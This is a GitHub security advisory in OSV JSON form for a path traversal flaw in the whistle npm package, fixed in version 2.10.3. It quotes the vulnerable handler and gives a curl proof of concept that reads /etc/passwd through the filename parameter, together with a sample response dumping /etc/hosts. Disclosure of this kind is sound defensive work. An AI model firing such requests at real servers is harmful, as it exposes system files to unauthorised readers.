{"id":"GHSA-3vfr-4gwf-qxfp","summary":"Whistle vulnerable to path traversal","details":"This bug was found by nova, which is an automated tool from group of Song Wu, intern, Zhejiang University; BoWang, independent researcher; Xingwei Lin, Zhejiang University.\n\n**Vulnerability detail**:\n\nIn service.js, inside \n`app.get('/cgi-bin/temp/get', ...):\nvar filename = req.query.filename;\nif (TEMP_FILE_RE.test(filename)) {\n  filename = path.join(TEMP_FILES_PATH, filename);\n}\ngetFile(filename, ...);`\n\n\nOnly when filename matches the temp/\u003chash\u003e pattern does it get joined to the safe directory TEMP_FILES_PATH.\n\nIf it does not match that pattern, the code does not block the request. Instead, it directly uses the user-supplied filename for file reading.\n\nIn other words: if you pass passwd, it will read passwd.\n\n**POC**:\ncurl -s \"http://127.0.0.1:8899/cgi-bin/temp/get?filename=/etc/passwd\"\n\n**response**:\n\n``` sh\nxiaoming@192 ~ % curl -s \"http://127.0.0.1:8899/cgi-bin/temp/get?filename=/etc/hosts\"\n{\"ec\":0,\"value\":\"##\\n# Host Database\\n#\\n# localhost is used to configure the loopback interface\\n# when the system is booting.  Do not change this entry.\\n##\\n127.0.0.1\\tlocalhost\\n255.255.255.255\\tbroadcasthost\\n::1             localhost\\n199.232.68.133 raw.githubusercontent.com\\n199.232.68.133 user-images.githubusercontent.com\\n199.232.68.133 avatars2.githubusercontent.com\\n199.232.68.133 avatars1.githubusercontent.com\\n127.0.0.1 lanyundev.com\\n\\n127.0.0.1 www.proxifier.com\\n127.0.0.1  proxifier.com\\n140.82.116.4 github.com\\n\\n# This line is auto added by aTrustAgent, do not modify, or aTrustAgent may unable to work\\n127.0.0.1\\tlocalhost.sangfor.com.cn\\n\\n\"}% \n```","aliases":["CVE-2026-55629"],"modified":"2026-08-26T00:54:29.262025646Z","published":"2026-08-25T18:32:06Z","database_specific":{"cwe_ids":["CWE-22"],"severity":"HIGH","github_reviewed":true,"github_reviewed_at":"2026-08-25T18:32:06Z","nvd_published_at":"2026-07-16T20:16:45Z"},"references":[{"type":"WEB","url":"https://github.com/avwo/whistle/security/advisories/GHSA-3vfr-4gwf-qxfp"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-55629"},{"type":"WEB","url":"https://github.com/avwo/whistle/commit/777bcf69bae2972aa7138a158c91619185653cf5"},{"type":"PACKAGE","url":"https://github.com/avwo/whistle"},{"type":"WEB","url":"http://github.com/avwo/whistle/releases/tag/v2.10.3"}],"affected":[{"package":{"name":"whistle","ecosystem":"npm","purl":"pkg:npm/whistle"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"2.10.3"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/08/GHSA-3vfr-4gwf-qxfp/GHSA-3vfr-4gwf-qxfp.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"}]}